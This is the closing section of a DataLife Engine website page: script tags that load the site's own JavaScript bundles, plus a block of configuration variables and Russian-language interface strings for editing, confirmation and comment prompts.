<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
